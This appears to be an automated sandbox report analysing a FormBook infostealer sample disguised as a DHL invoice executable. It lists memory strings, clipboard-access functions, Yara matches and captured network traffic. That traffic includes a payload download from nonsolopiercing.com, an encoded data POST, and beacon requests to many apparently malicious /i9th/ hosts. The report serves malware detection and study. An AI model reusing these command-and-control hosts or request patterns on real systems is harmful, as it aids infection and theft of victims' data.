Source: explorer.exe, 0000000A.00000003.3622002335.000000000D6AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3627191346.000000000D6B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6902699355.000000000D6AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3162334795.000000000D6AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000A.00000002.6902699355.000000000D60A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3161433559.000000000D607000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.comO
Source: explorer.exe, 0000000A.00000002.6924685409.00000000152D4000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000005A74000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: explorer.exe, 0000000A.00000002.6924685409.0000000014C8C000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.000000000542C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://funnull.com/images/og-image-en.png
Source: DHLINV000156.exe, 00000002.00000003.1947032871.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1948493703.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr, System.dll.2.dr	String found in binary or memory: https://github.com/dotnet/runtime
Source: colorcpl.exe, 0000000C.00000003.3456433810.0000000007C80000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
Source: explorer.exe, 0000000A.00000000.3148668525.0000000005A37000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant:
Source: colorcpl.exe, 0000000C.00000003.3456433810.0000000007C80000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: DHLINV000156.exe, 00000008.00000001.2368782551.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: colorcpl.exe, 0000000C.00000002.6876170729.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3396657076.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3399478277.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: colorcpl.exe, 0000000C.00000002.6876170729.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3396657076.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3399478277.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: colorcpl.exe, 0000000C.00000002.6876170729.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3396657076.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3399478277.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr	String found in binary or memory: https://mozilla.org0
Source: explorer.exe, 0000000A.00000002.6902699355.000000000D60A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3161433559.000000000D607000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000A.00000000.3140863853.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6874670041.00000000013A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comE
Source: explorer.exe, 0000000A.00000000.3171166854.000000000F9FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6914647937.000000000F9FF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 0000000A.00000002.6924685409.0000000015DD2000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000006572000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=d&domain=riverflow.net&origin=sales_lande
Source: colorcpl.exe, 0000000C.00000002.6890340919.0000000007480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: colorcpl.exe, 0000000C.00000002.6890340919.0000000007503000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3401883899.0000000007495000.00000004.00000020.00020000.00000000.sdmp, AeL-0b1QRQ.12.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: colorcpl.exe, 0000000C.00000002.6890340919.0000000007503000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3401883899.0000000007495000.00000004.00000020.00020000.00000000.sdmp, AeL-0b1QRQ.12.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000A.00000000.3152133955.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6889834307.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000A.00000002.6880980073.000000000389D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3143756471.000000000389D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3620681893.000000000389D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/S0
Source: explorer.exe, 0000000A.00000000.3173692642.000000000FAB6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6914647937.000000000FA97000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6902699355.000000000D60A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3161433559.000000000D607000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 0000000A.00000002.6924685409.000000001591C000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.00000000060BC000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.cmproutdoors.com/i9th/?YM=lqJURYfuPjuznURrThj0aNiAAsaH1/tf
Source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000002.00000003.1950649705.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3175026004.000000000FBE1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6914647937.000000000FBDD000.00000004.00000001.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: colorcpl.exe, 0000000C.00000002.6890340919.0000000007503000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3401883899.0000000007495000.00000004.00000020.00020000.00000000.sdmp, AeL-0b1QRQ.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 0000000A.00000002.6924685409.0000000014C8C000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.000000000542C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-149504339-1
Source: explorer.exe, 0000000A.00000002.6924685409.0000000014FB0000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000005750000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hhkk143.cfd/i9th/?YM=a
Source: explorer.exe, 0000000A.00000000.3152133955.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6889834307.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000A.00000000.3148668525.0000000005A37000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/democratic-su
Source: explorer.exe, 0000000A.00000002.6886057821.0000000005A37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3148668525.0000000005A37000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/white-house-chaos-as-video-shows-joe-biden-aides-stop-report
Source: explorer.exe, 0000000A.00000000.3152133955.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6889834307.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000A.00000000.3152133955.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6889834307.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000A.00000002.6886057821.0000000005A37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3148668525.0000000005A37000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/uk-climate-activis:
Source: explorer.exe, 0000000A.00000000.3152133955.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6889834307.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000A.00000000.3152133955.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6889834307.0000000009BE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000000A.00000002.6924685409.00000000147D6000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000004F76000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3457016308.000000000B996000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.sandyhillsagritourism.com/i9th?F20=_ng1IJ&YM=PDhFruS31XQUb4y36
Source: explorer.exe, 0000000A.00000002.6924685409.0000000015466000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6890151620.0000000007150000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000005C06000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

Source: unknown

HTTP traffic detected: POST /i9th/ HTTP/1.1Host: www.sem-jobs.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.sem-jobs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sem-jobs.com/i9th/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 4d 3d 7e 35 74 6f 4e 35 68 77 70 35 51 6a 61 45 58 30 7e 33 66 36 74 69 37 37 72 76 54 68 67 48 7a 74 39 69 7a 4f 78 63 4c 6c 36 71 78 58 36 4b 49 62 6b 33 4a 6f 58 55 76 57 4b 5f 39 64 43 66 6e 45 7e 32 6c 70 30 4d 71 59 56 78 71 64 43 35 62 63 39 57 56 4f 6f 68 37 30 6b 73 34 37 6a 45 59 7a 41 66 59 57 49 4d 58 30 57 6f 64 36 72 64 45 49 63 5f 67 53 52 4c 6b 7a 36 62 4c 64 34 58 4e 54 75 47 47 68 36 49 55 50 68 56 51 62 38 50 74 6f 50 35 4a 71 71 4f 6b 6a 7e 41 52 38 31 54 50 56 57 34 32 6a 44 73 41 72 4f 31 47 79 36 72 6a 6e 33 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: YM=~5toN5hwp5QjaEX0~3f6ti77rvThgHzt9izOxcLl6qxX6KIbk3JoXUvWK_9dCfnE~2lp0MqYVxqdC5bc9WVOoh70ks47jEYzAfYWIMX0Wod6rdEIc_gSRLkz6bLd4XNTuGGh6IUPhVQb8PtoP5JqqOkj~AR81TPVW42jDsArO1Gy6rjn3w).

Source: unknown

DNS traffic detected: queries for: nonsolopiercing.com

Source: global traffic	HTTP traffic detected: GET /wp-content/vSvXWEFHsgTrbgVnnEpdo45.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: nonsolopiercing.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1Host: www.sandyhillsagritourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&F20=_ng1IJ HTTP/1.1Host: www.sem-jobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw== HTTP/1.1Host: www.casinoenligne-france.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&F20=_ng1IJ HTTP/1.1Host: www.37123.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ== HTTP/1.1Host: www.adasoft.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&F20=_ng1IJ HTTP/1.1Host: www.hhkk143.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA== HTTP/1.1Host: www.popcors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&F20=_ng1IJ HTTP/1.1Host: www.spotcheck.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw== HTTP/1.1Host: www.dinggubd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=e0G7KvvSnXpGXx+R6TzWFmwlzMjwM1CfwQYDrhzCOtfsddq8ukik0UKA2v6ej/ZrW3TOdSCJ2lVMgjL9UMLlhRMn0e8ae0vL4Q==&F20=_ng1IJ HTTP/1.1Host: www.hot6s.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=uGolGY6UqX3sY/9PLVWwN9J/BTzz+6hffrhecVGN5FjI635Z0j5At+r+BPTklOB2HfIE21jETmQJryl68L/U0+pl2AIDG80kBg== HTTP/1.1Host: www.0w3jy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=lqJURYfuPjuznURrThj0aNiAAsaH1/tf+kf9L6kKBxqjEkH5T6yZpcUSZY6yP89JvXg35e6PTbHFvlwlO73OfbEtyEO8MEspLQ==&F20=_ng1IJ HTTP/1.1Host: www.cmproutdoors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=f7i/reR9z/XYtiufs4T2oCglTJHppPIhAuHFUSLntHIlLxYI6+YKRHThES4heztnev1TOQxmA1eDErfm329tx1/Ku+4bHpf60w== HTTP/1.1Host: www.daon3999.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=oRug1p2N3M7f21OO0lOBGqE4PfaV2grEv9VY5puRv4+mIhzAnHI5ZAphwtkKSkIVc0m4kQAL+gvPk8R76uitxElzOZBQuGepJQ==&F20=_ng1IJ HTTP/1.1Host: www.5319ss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=djsn1an+GmzwXFTB/MFsKGQXJOZQhusBpj6p6RqECbOdtpCOv2Kvcnth4kqs1edHWjVNJqZCDFfEwc47KO0/1j4B7gbgnVo+SQ== HTTP/1.1Host: www.riverflow.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=k3d2rpkNYMKNWaTFA3t0FG4YoWbTiA9z8X9PQFaufAL9B597B9+6rAPLCs31mdZA/v+HUWU5or1J0geLcv9LMooOfPEJdI/q3g==&F20=_ng1IJ HTTP/1.1Host: www.verde-amar.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1Host: www.sandyhillsagritourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&F20=_ng1IJ HTTP/1.1Host: www.sem-jobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw== HTTP/1.1Host: www.casinoenligne-france.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&F20=_ng1IJ HTTP/1.1Host: www.37123.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ== HTTP/1.1Host: www.adasoft.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&F20=_ng1IJ HTTP/1.1Host: www.hhkk143.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA== HTTP/1.1Host: www.popcors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&F20=_ng1IJ HTTP/1.1Host: www.spotcheck.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw== HTTP/1.1Host: www.dinggubd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=e0G7KvvSnXpGXx+R6TzWFmwlzMjwM1CfwQYDrhzCOtfsddq8ukik0UKA2v6ej/ZrW3TOdSCJ2lVMgjL9UMLlhRMn0e8ae0vL4Q==&F20=_ng1IJ HTTP/1.1Host: www.hot6s.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\DHLINV000156.exe

Code function: 2_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,

2_2_0040523F

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0000000C.00000002.6881079830.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.6880751145.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.6874962433.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3226190234.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3225862883.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands

Found potential ransomware demand text

Source: colorcpl.exe, 0000000C.00000003.3456433810.0000000007C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
Source: colorcpl.exe, 0000000C.00000003.3456433810.0000000007C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
Source: colorcpl.exe, 0000000C.00000003.3456433810.0000000007C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
Source: colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
Source: colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@T